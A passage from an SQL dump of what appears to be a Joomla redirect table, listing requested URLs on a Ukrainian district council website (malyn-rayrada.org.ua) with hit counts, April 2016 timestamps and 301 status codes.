00:00:00',301),(28294,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=614:2012-03-26-16-06-35&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 14:43:22','0000-00-00 00:00:00',301),(28295,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=710:2012-06-14-15-07-29&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 15:28:53','0000-00-00 00:00:00',301),(28296,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=705:-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 15:43:57','0000-00-00 00:00:00',301),(28297,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=451:-2011-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 15:47:24','0000-00-00 00:00:00',301),(28298,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=443:-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 16:28:29','0000-00-00 00:00:00',301),(28299,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=819:2012-11-14-16-40-09&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 16:40:46','0000-00-00 00:00:00',301),(28300,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=466:-l-r-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 16:54:40','0000-00-00 00:00:00',301),(28301,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=770:-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 16:56:35','0000-00-00 00:00:00',301),(28302,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1061:2013-07-29-08-58-16&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 17:25:28','0000-00-00 00:00:00',301),(28303,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1165:-2014-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 17:25:29','0000-00-00 00:00:00',301),(28304,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=367:-1620-19072011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 17:34:34','0000-00-00 00:00:00',301),(28305,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1197:-l-r-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 18:00:41','0000-00-00 00:00:00',301),(28306,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1214:2014-02-18-09-51-45&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 18:16:41','0000-00-00 00:00:00',301),(28307,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1074:2013-09-02-05-02-30&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 19:55:34','0000-00-00 00:00:00',301),(28308,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=784:-9-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 19:55:36','0000-00-00 00:00:00',301),(28309,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=914:2013-01-23-13-21-28&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 20:02:19','0000-00-00 00:00:00',301),(28310,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=864:------qq&lang=en&option=com_content&view=article','','','',1,0,'2016-04-04 20:16:06','0000-00-00 00:00:00',301),(28311,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-04 20:46:00','0000-00-00 00:00:00',301),(28312,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44?start=14','','','',1,0,'2016-04-04 21:20:50','0000-00-00 00:00:00',301),(28313,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=784:-9-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 22:13:33','0000-00-00 00:00:00',301),(28314,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=206:2010-12-15-14-19-27&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 22:46:06','0000-00-00 00:00:00',301),(28315,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=211:2010-12-15-14-46-24&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 22:46:08','0000-00-00 00:00:00',301),(28316,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=541:2012-01-26-11-55-32&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 23:37:29','0000-00-00 00:00:00',301),(28317,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=554:-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-04 23:45:36','0000-00-00 00:00:00',301),(28318,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=15&id=860:09&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-04 23:50:02','0000-00-00 00:00:00',301),(28319,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=846:2012-12-10-14-06-00&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 00:46:21','0000-00-00 00:00:00',301),(28320,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=880:2012-12-21-17-03-54&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 01:05:42','0000-00-00 00:00:00',301),(28321,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1015:-200-&lang=en&option=com_content&view=article','','','',1,0,'2016-04-05 01:38:34','0000-00-00 00:00:00',301),(28322,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=712:2012-06-14-15-11-24&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-04-05 02:17:42','0000-00-00 00:00:00',301),(28323,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1035:2013-06-25-09-55-31&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 02:35:23','0000-00-00 00:00:00',301),(28324,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&id=55&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-05 02:35:25','0000-00-00 00:00:00',301),(28325,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/914-pro-zatverdzhennya-rajonnoji-programi-polipshennya-medichnogo-obslugovuvannya-silskogo-naselennya-malinskogo-rajonu-na-2015-2019-roki','','','',2,0,'2016-04-05 02:35:35','0000-00-00 00:00:00',301),(28326,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=878:2012-12-21-16-59-28&catid=46:--21122012&Itemid=85&lang=uk','','','',2,0,'2016-04-05 02:35:39','0000-00-00 00:00:00',301),(28327,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=799:2012-10-18-13-37-03&catid=45&Itemid=84&lang=uk','','','',2,0,'2016-04-05 02:35:40','0000-00-00 00:00:00',301),(28328,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=654:-2012-&catid=42&Itemid=80&lang=uk','','','',2,0,'2016-04-05 02:35:41','0000-00-00 00:00:00',301),(28329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=715:2012-06-14-15-17-44&catid=43&Itemid=82&lang=uk','','','',2,0,'2016-04-05 02:35:56','0000-00-00 00:00:00',301),(28330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=577:--------2011--&catid=39&Itemid=76&lang=uk','','','',2,0,'2016-04-05 02:35:56','0000-00-00 00:00:00',301),(28331,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=663:-------20042012675-12&catid=41&Itemid=78&lang=uk','','','',2,0,'2016-04-05 02:36:00','0000-00-00 00:00:00',301),(28332,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1:2010-06-05-13-18-17&catid=9&Itemid=11&lang=uk','','','',1,0,'2016-04-05 02:36:12','0000-00-00 00:00:00',301),(28333,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=772:-2011-2012-&catid=45&Itemid=84&lang=uk','','','',1,0,'2016-04-05 02:36:13','0000-00-00 00:00:00',301),(28334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=740:-lr-&catid=43&Itemid=82&lang=uk','','','',1,0,'2016-04-05 02:36:20','0000-00-00 00:00:00',301),(28335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=563:-30012012185-12&catid=39&Itemid=76&lang=uk','','','',1,0,'2016-04-05 02:36:22','0000-00-00 00:00:00',301),(28336,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=845:-2012-2013-&catid=46&Itemid=85&lang=uk','','','',1,0,'2016-04-05 02:36:23','0000-00-00 00:00:00',301),(28337,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&catid=13:2010-06-06-03-57-58&Itemid=33&lang=en','','','',2,0,'2016-04-05 02:36:57','0000-00-00 00:00:00',301),(28338,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=788:-lr-2012-2015-&catid=45&Itemid=84&lang=uk','','','',2,0,'2016-04-05 02:37:23','0000-00-00 00:00:00',301),(28339,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-ob’ektiv-shho','','','',2,0,'2016-04-05 02:37:30','0000-00-00 00:00:00',301),(28340,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1090:-l-r-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 03:51:30','0000-00-00 00:00:00',301),(28341,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=885:-2013-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 03:56:27','0000-00-00 00:00:00',301),(28342,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=730:2012-07-02-05-04-18&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 03:59:50','0000-00-00 00:00:00',301),(28343,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=999:2013-04-28-05-21-05&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 04:00:10','0000-00-00 00:00:00',301),(28344,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=827:2012-11-20-17-44-21&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-05 04:19:31','0000-00-00 00:00:00',301),(28345,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1207:-----------------2007-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-05 04:21:38','0000-00-00 00:00:00',301),(28346,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=982:2013-04-03-11-58-18&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 05:24:25','0000-00-00 00:00:00',301),(28347,'http://www.malyn-rayrada.org.ua/index.php?Itemid=90&id=50&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-05 05:36:34','0000-00-00 00:00:00',301),(28348,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=13:2010-06-06-03-57-58&id=13:2010-06-06-04-07-00&itemid=33&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-05 05:55:55','0000-00-00 00:00:00',301),(28349,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1084:-qq&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-04-05 06:13:01','0000-00-00 00:00:00',301),(28350,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1030:2013-06-17-06-46-59&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-05 06:43:29','0000-00-00 00:00:00',301),(28351,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=970:-90-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 06:48:52','0000-00-00 00:00:00',301),(28352,'http://www.malyn-rayrada.org.ua/index.php?id=48:--11032013-&Itemid=87&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-05 07:26:58','0000-00-00 00:00:00',301),(28353,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=927:2013-02-21-09-06-04&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 08:26:11','0000-00-00 00:00:00',301),(28354,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=937:---------------------------21122012--l--&Itemid=86&lang=en&option=com_content&view=article','','','',1,0,'2016-04-05 08:39:41','0000-00-00 00:00:00',301),(28355,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/427-visti-iz-josipivki-za-materialami-trs-polissja','','','',1,0,'2016-04-05 09:58:43','0000-00-00 00:00:00',301),(28356,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=946:-l-r-2011-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-05 11:32:47','0000-00-00 00:00:00',301),(28357,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=615:-------26032012495-12&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 11:58:54','0000-00-00 00:00:00',301),(28358,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=724:-27042012252&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 12:16:56','0000-00-00 00:00:00',301),(28359,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1161:2013-12-18-13-34-32&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 12:28:28','0000-00-00 00:00:00',301),(28360,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1088-pro-zvernennya-do-prem-er-ministra-ukrajini-shchodo-nadannya-praktichnoji-dopomogi-v-pitanni-rozblokuvannya-rakhunkiv-upravlinnya-pratsi-ta-sotsialnogo-zakhistu-naselennya-malinskoji-rajonnoji-derzhavnoji-administratsiji','','','',1,0,'2016-04-05 13:27:48','0000-00-00 00:00:00',301),(28361,'http://malyn-rayrada.org.ua/index.php/1075-shanovni-malinchani-ta-gosti-malinshchini?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-04-05 14:33:51','0000-00-00 00:00:00',301),(28362,'http://www.malyn-rayrada.org.ua/index.php?Itemid=87&catid=48&id=961:2013-03-11-10-51-56&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-05 15:04:56','0000-00-00 00:00:00',301),(28363,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=44&layout=blog&Itemid=83&lang=uk','','','',1,0,'2016-04-05 16:05:11','0000-00-00 00:00:00',301),(28364,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=635:-2011-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-05 16:55:35','0000-00-00 00:00:00',301),(28365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=455:2011-11-10-13-39-05&catid=38&Itemid=73&lang=ru','','','',1,0,'2016-04-05 16:58:43','0000-00-00 00:00:00',301),(28366,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1188:2014-01-28-09-45-21&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 17:54:37','0000-00-00 00:00:00',301),(28367,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=742:-14-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-05 18:16:20','0000-00-00 00:00:00',301),(28368,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=343:-2011-&catid=34&Itemid=68&lang=ru','','','',1,0,'2016-04-05 19:35:30','0000-00-00 00:00:00',301),(28369,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=709:2012-06-14-15-04-11&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-05 23:29:04','0000-00-00 00:00:00',301),(28370,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=592:2012-02-27-15-06-10&Itemid=77&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 00:18:35','0000-00-00 00:00:00',301),(28371,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=450:-l-2011-2013-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-06 03:41:57','0000-00-00 00:00:00',301),(28372,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=767:2012-10-01-08-20-30&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 03:43:01','0000-00-00 00:00:00',301),(28373,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=610:2012-03-23-06-34-31&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-06 03:50:26','0000-00-00 00:00:00',301),(28374,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=724:-27042012252&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-06 04:07:51','0000-00-00 00:00:00',301),(28375,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=835:2012-12-02-07-47-14&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 05:06:21','0000-00-00 00:00:00',301),(28376,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-04-06 05:42:44','0000-00-00 00:00:00',301),(28377,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=218:2010-12-21-06-45-54&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-06 06:05:55','0000-00-00 00:00:00',301),(28378,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1:2010-06-05-13-18-17&catid=9:2010-06-05-12-55-45&Itemid=11&lang=en','','','',1,0,'2016-04-06 07:56:41','0000-00-00 00:00:00',301),(28379,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=451:-2011-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 08:08:33','0000-00-00 00:00:00',301),(28380,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=636:-2011-2015-&Itemid=80&lang=en&option=com_content&view=article','','','',1,0,'2016-04-06 08:14:16','0000-00-00 00:00:00',301),(28381,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1151:2013-11-28-14-54-33&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-06 08:37:43','0000-00-00 00:00:00',301),(28382,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/golod15.jpg','','','',1,0,'2016-04-06 09:18:17','0000-00-00 00:00:00',301),(28383,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/golod.jpg','','','',1,0,'2016-04-06 10:02:58','0000-00-00 00:00:00',301),(28384,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-----l90---r&catid=47:--21022013-&Itemid=86&lang=en','','','',1,0,'2016-04-06 12:01:48','0000-00-00 00:00:00',301),(28385,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=635:-2011-2015-&Itemid=80&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 12:34:05','0000-00-00 00:00:00',301),(28386,'http://malyn-rayrada.org.ua/index.php/101-hristijanskij-svit-svjatkue-verbnu-nedilju-ta','','','',1,0,'2016-04-06 12:34:07','0000-00-00 00:00:00',301),(28387,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/1-znajomtes-malinshhina','','','',2,0,'2016-04-06 12:35:40','0000-00-00 00:00:00',301),(28388,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=884:2012-12-24-10-46-13&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-06 13:05:38','0000-00-00 00:00:00',301),(28389,'http://www.malyn-rayrada.org.ua/index.php?Itemid=87&id=48:--11032013-&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-06 13:47:37','0000-00-00 00:00:00',301),(28390,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=600:2012-03-01-06-12-24&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 14:46:30','0000-00-00 00:00:00',301),(28391,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1338:2014-06-11-14-18-06&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-06 15:20:23','0000-00-00 00:00:00',301),(28392,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1132:2013-11-13-10-02-24&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 15:58:40','0000-00-00 00:00:00',301),(28393,'http://malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/432-pro-zatverdzhennja-porjadku-i-normativiv_3','','','',1,0,'2016-04-06 17:32:25','0000-00-00 00:00:00',301),(28394,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/433-analiz-reguljatornogo-vplivu_2?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-04-06 19:19:05','0000-00-00 00:00:00',301),(28395,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=437:-----l-r--2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-06 19:28:36','0000-00-00 00:00:00',301),(28396,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=101:2010-08-12-06-49-25&catid=26&Itemid=54&lang=en','','','',1,0,'2016-04-06 19:42:15','0000-00-00 00:00:00',301),(28397,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?catid=36:2011-07-21-07-51-53&id=425:------------2011-2012-&Itemid=0&lang=en','','','',1,0,'2016-04-06 20:01:37','0000-00-00 00:00:00',301),(28398,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=593:-lr&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 21:03:57','0000-00-00 00:00:00',301),(28399,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=890:2014-01-06-08-19-15&lang=en&option=com_content&view=article','','','',1,0,'2016-04-06 21:31:52','0000-00-00 00:00:00',301),(28400,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=731:2012-07-02-08-51-09&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 21:32:13','0000-00-00 00:00:00',301),(28401,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1196:2014-01-30-14-12-50&Itemid=&lang=en&option=com_content&view=article','','','',7,0,'2016-04-06 21:33:50','0000-00-00 00:00:00',301),(28402,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=425:-2011-2012-&Itemid=72&lang=ru&option=com_content&view=article','','','',5,0,'2016-04-06 21:34:25','0000-00-00 00:00:00',301),(28403,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=619:-11-6-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 21:42:38','0000-00-00 00:00:00',301),(28404,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:--24--6-&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-04-06 21:47:18','0000-00-00 00:00:00',301),(28405,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=545:2012-01-26-12-06-01&Itemid=76&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 21:48:55','0000-00-00 00:00:00',301),(28406,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1204:2014-01-31-07-51-23&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 21:50:46','0000-00-00 00:00:00',301),(28407,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=513:-lr-2012-2015-&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-06 22:04:47','0000-00-00 00:00:00',301),(28408,'http://www.malyn-rayrada.org.ua/index.php?id=37&Itemid=72&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-04-06 22:08:36','0000-00-00 00:00:00',301),(28409,'http://www.malyn-rayrada.org.ua/index.php?id=40&Itemid=77&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-04-06 22:12:48','0000-00-00 00:00:00',301),(28410,'http://malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=608:2012-03-15-08-40-03&itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-06 22:59:52','0000-00-00 00:00:00',301),(28411,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=777:2012-10-02-10-06-36&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-06 23:03:11','0000-00-00 00:00:00',301),(28412,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=760:-qq-24-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 00:16:54','0000-00-00 00:00:00',301),(28413,'http://www.malyn-rayrada.org.ua/index.php?Itemid=11&catid=9:2010-06-05-12-55-45&id=1:2010-06-05-13-18-17&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 00:33:31','0000-00-00 00:00:00',301),(28414,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=196:---------------------2005-2010-&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 00:33:33','0000-00-00 00:00:00',301),(28415,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1196-2014-01-30-14-12-50?lang=uk','','','',1,0,'2016-04-07 00:38:01','0000-00-00 00:00:00',301),(28416,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1062:2013-07-29-13-33-29&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 00:52:06','0000-00-00 00:00:00',301),(28417,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1208:2014-01-31-13-48-49&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 03:53:20','0000-00-00 00:00:00',301),(28418,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=731:2012-07-02-08-51-09&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 07:42:15','0000-00-00 00:00:00',301),(28419,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=890:2014-01-06-08-19-15&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 07:42:31','0000-00-00 00:00:00',301),(28420,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=731:2012-07-02-08-51-09&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 07:43:36','0000-00-00 00:00:00',301),(28421,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=731:2012-07-02-08-51-09&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 07:44:41','0000-00-00 00:00:00',301),(28422,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=731:2012-07-02-08-51-09&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 07:45:11','0000-00-00 00:00:00',301),(28423,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=825:-q-q&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 07:46:34','0000-00-00 00:00:00',301),(28424,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=731:2012-07-02-08-51-09&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 07:48:32','0000-00-00 00:00:00',301),(28425,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=890:2013-01-06-09-42-40&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 07:49:41','0000-00-00 00:00:00',301),(28426,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=990:-2013-&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 07:50:33','0000-00-00 00:00:00',301),(28427,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=687:2012-05-24-11-21-04&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 07:51:27','0000-00-00 00:00:00',301),(28428,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1207:-2007-2015-&Itemid=97&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 07:52:01','0000-00-00 00:00:00',301),(28429,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=796:2012-10-18-07-54-09&catid=45&Itemid=84&lang=ru','','','',1,0,'2016-04-07 07:52:54','0000-00-00 00:00:00',301),(28430,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=890:2014-01-06-08-19-15&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 07:54:15','0000-00-00 00:00:00',301),(28431,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=731:2012-07-02-08-51-09&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 07:54:56','0000-00-00 